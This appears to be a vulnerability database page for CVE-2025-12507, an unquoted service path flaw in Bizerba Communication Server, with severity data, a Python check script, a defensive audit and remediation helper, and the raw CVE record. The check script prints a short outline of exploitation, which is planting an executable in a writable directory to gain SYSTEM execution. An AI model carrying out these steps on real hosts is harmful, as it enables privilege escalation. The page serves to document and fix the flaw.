Security Vulnerability Report
CVE-2025-12507 CVSS 8.8 HIGH

CVE-2025-12507

Published: 2025-10-31 16:15:39
Last Modified: 2026-04-15 00:35:42
Source: 0beee27a-7d8c-424f-8e46-ac453fa147e6

Description

The service Bizerba Communication Server (BCS) has an unquoted service path. Due to the way Windows searches the executable for the BCS service, malicious programs can be executed.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Bizerba Communication Server (BCS) - all unpatched versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-12507 PoC - Bizerba Communication Server Unquoted Service Path

This PoC demonstrates how to check for unquoted service paths in Windows.
Note: This is for educational and authorized testing purposes only.
"""
import subprocess
import sys


def check_unquoted_service_path(service_name):
    """
    Query Windows service configuration to check for unquoted paths.

    Note: wmic is deprecated on current Windows builds and may be absent;
    `sc qc <name>` or Get-CimInstance Win32_Service in PowerShell returns
    the same PathName information.
    """
    try:
        cmd = f'wmic service where "name=\'{service_name}\'" get pathname,state,startmode'
        result = subprocess.check_output(cmd, shell=True, text=True)
        print(f"[+] Service: {service_name}")
        print(result)
        # wmic prints a header line followed by one data line, with the
        # columns aligned under the header words. The path is the text of
        # the data line up to the offset where the second column starts;
        # testing the whole line for spaces would flag every service.
        lines = [ln.rstrip() for ln in result.strip().splitlines() if ln.strip()]
        if len(lines) > 1:
            header, data = lines[0], lines[1]
            second_col = header.index(header.split()[1])
            path_info = data[:second_col].strip()
            # Check if path contains spaces and is not quoted
            if ' ' in path_info and not path_info.startswith('"'):
                print("[!] VULNERABLE: Unquoted path with spaces detected!")
                print(f"[!] Path: {path_info}")
                return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False


def exploit_unquoted_path(target_path, malicious_exe):
    """
    Simulate exploitation by copying malicious exe to intermediate path.
    WARNING: This is for authorized testing only.
    """
    print("[!] To exploit this vulnerability:")
    print("[!] 1. Identify an intermediate directory with write permissions")
    print(f"[!] 2. Place malicious executable in: {target_path}")
    print("[!] 3. Wait for service restart or trigger restart")
    print("[!] 4. Malicious code will execute with SYSTEM privileges")


if __name__ == "__main__":
    # Check for Bizerba Communication Server
    service_name = "BCS"  # Adjust service name as needed
    if check_unquoted_service_path(service_name):
        print("\n[+] Vulnerability confirmed!")
    else:
        print("[-] Service not found or not vulnerable")
```
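The wmic check above only reports that a path is unquoted. The audit helper below, added here and not part of the original PoC or of Bizerba's advisory, works through the mechanism the description refers to: for an unquoted ImagePath containing spaces it lists the file names Windows probes before the intended executable, and it produces the quoted value (written back with `sc config ... binPath=`) that closes CWE-428. The sample ImagePath values are constructed; the record does not give the real BCS install path.

```python
import re

# Constructed sample ImagePath values; the real BCS install path is not
# given in the CVE record, so these are illustrative placeholders.
SAMPLE_SERVICES = {
    "BCS": r"C:\Program Files\Bizerba\BCS Server\bcs.exe -service",
    "Spooler": r"C:\WINDOWS\System32\spoolsv.exe",
    "GoodSvc": r'"C:\Program Files\Vendor\Good Service\svc.exe" /run',
}

_EXE_RE = re.compile(r"^(.*?\.exe)(.*)$", re.IGNORECASE)

def split_image_path(image_path):
    """Return (executable, arguments). A leading double-quoted token is the
    executable; otherwise it runs up to and including the first '.exe'."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end], s[end + 1:].strip()
    m = _EXE_RE.match(s)
    return (m.group(1), m.group(2).strip()) if m else (s, "")

def is_unquoted_with_spaces(image_path):
    """CWE-428 condition: path not quoted and a space inside the executable."""
    s = image_path.strip()
    return not s.startswith('"') and " " in split_image_path(s)[0]

def search_candidates(image_path):
    """Files the service control manager tries, in order, before the intended
    executable: every prefix that ends at a space, with '.exe' appended."""
    exe, _ = split_image_path(image_path)
    if not is_unquoted_with_spaces(image_path):
        return [exe]
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "] + [exe]

def remediation_command(service, image_path):
    """'sc config' line that rewrites ImagePath with the executable quoted;
    the inner quotes must be escaped inside sc's own quoted argument."""
    exe, args = split_image_path(image_path)
    quoted = f'"{exe}"' + (f" {args}" if args else "")
    inner = quoted.replace('"', '\\"')
    return f'sc.exe config "{service}" binPath= "{inner}"'

def audit(services):
    """Map each affected service name to the probe order Windows would use."""
    return {n: search_candidates(p) for n, p in services.items()
            if is_unquoted_with_spaces(p)}

if __name__ == "__main__":
    for name, cands in audit(SAMPLE_SERVICES).items():
        print(f"[!] {name}: unquoted path; probed before the real exe: {cands[:-1]}")
        print("    fix:", remediation_command(name, SAMPLE_SERVICES[name]))
```

Each probed prefix names a directory an administrator should confirm is not writable by standard users until the path is quoted.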

References

https://www.bizerba.com/downloads/global/information-security/2025/bizerba-sa-2025-0005.pdf (vendor security advisory, listed in the record's references field)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12507",
    "sourceIdentifier": "0beee27a-7d8c-424f-8e46-ac453fa147e6",
    "published": "2025-10-31T16:15:39.447",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The service Bizerba Communication Server (BCS) has an unquoted service path. Due to the way Windows searches the executable for the BCS service, malicious programs can be executed."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "0beee27a-7d8c-424f-8e46-ac453fa147e6",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.0,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "0beee27a-7d8c-424f-8e46-ac453fa147e6",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-428"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.bizerba.com/downloads/global/information-security/2025/bizerba-sa-2025-0005.pdf",
        "source": "0beee27a-7d8c-424f-8e46-ac453fa147e6"
      }
    ]
  }
}
```